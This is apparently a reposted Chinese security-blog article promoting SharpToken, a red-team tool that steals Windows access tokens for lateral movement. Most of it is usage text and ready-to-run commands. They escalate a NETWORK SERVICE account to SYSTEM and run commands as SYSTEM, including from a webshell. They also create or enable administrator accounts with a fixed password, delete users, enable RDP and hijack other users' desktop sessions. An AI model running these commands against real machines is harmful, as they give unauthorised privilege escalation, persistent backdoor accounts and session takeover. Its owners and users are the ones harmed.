【横向移动】SharpToken - Windows 令牌窃取
read file error: read notes: is a directory 2023-6-23 13:5:49 Author: Ots安全(查看原文) 阅读量:44 收藏

关注我们 | 发现更多精彩内容

在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也没有办法使用“OpenProcessToken”来窃取 Token。
SharpToken 是一种利用令牌泄漏的工具。它可以从系统中的所有进程中找到泄漏的令牌并使用它们。如果你是低权限服务用户,你甚至可以用它升级到“NT AUTHORITY\SYSTEM”权限,无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。..

用法
SharpToken By BeichenDream=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEMe.g.SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass

Usage:
SharpToken COMMAND arguments


COMMANDS:
        list_token [process pid]        [bypass]
        list_all_token [process pid] [bypass]
        add_user    <username> <password> [group] [domain] [bypass]
        enableUser <username> <NewPassword> [NewGroup] [bypass]
        delete_user <username> [domain] [bypass]
        execute <tokenUser> <commandLine> [Interactive] [bypass]
        enableRDP [bypass]
        tscon <targetSessionId> [sourceSessionId] [bypass]

example:    SharpToken list_token    SharpToken list_token bypass    SharpToken list_token 6543    SharpToken add_user admin Abcd1234! Administrators    SharpToken enableUser Guest Abcd1234! Administrators    SharpToken delete_user admin    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass    SharpToken tscon 1



提升权限
除了通常的Token窃取权限增强,SharpToken还支持通过Bypass获取完整的Token
如果你是 NT AUTHORITY/NETWORK SERVICE 用户,你添加了 bypass 参数,SharpToken 会从 RPCSS 窃取 System,即无条件地将 NT AUTHORITY\NETWORK SERVICE 改为 NT AUTHORITY\SYSTEM

ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)

SharpToken list_token

枚举来自指定进程的令牌

SharpToken list_token 468

获取交互式外壳

execute "NT AUTHORITY\SYSTEM" cmd true

获取命令执行结果(在webshell下执行)

SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

使用窃取的令牌创建管理员用户

SharpToken add_user admin Abcd1234! Administrators

使用被盗令牌启用管理员用户

SharpToken enableUser Guest Abcd1234! Administrators

使用被盗令牌删除用户

SharpToken delete_user admin

使用窃取的Token切换到目标桌面

其中1是目标用户的桌面,2是我们要接收的桌面

SharpToken tscon 1 2

项目地址:

https://github.com/BeichenDream/SharpToken

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247499202&idx=1&sn=88bb2e54d49663d3c404a1b7fe595c8f&chksm=9badb489acda3d9f5afa761a3bfa745c5f034d4eeeaee036e8cacb9cb338ade319f597879eab#rd
如有侵权请联系:admin#unsafe.sh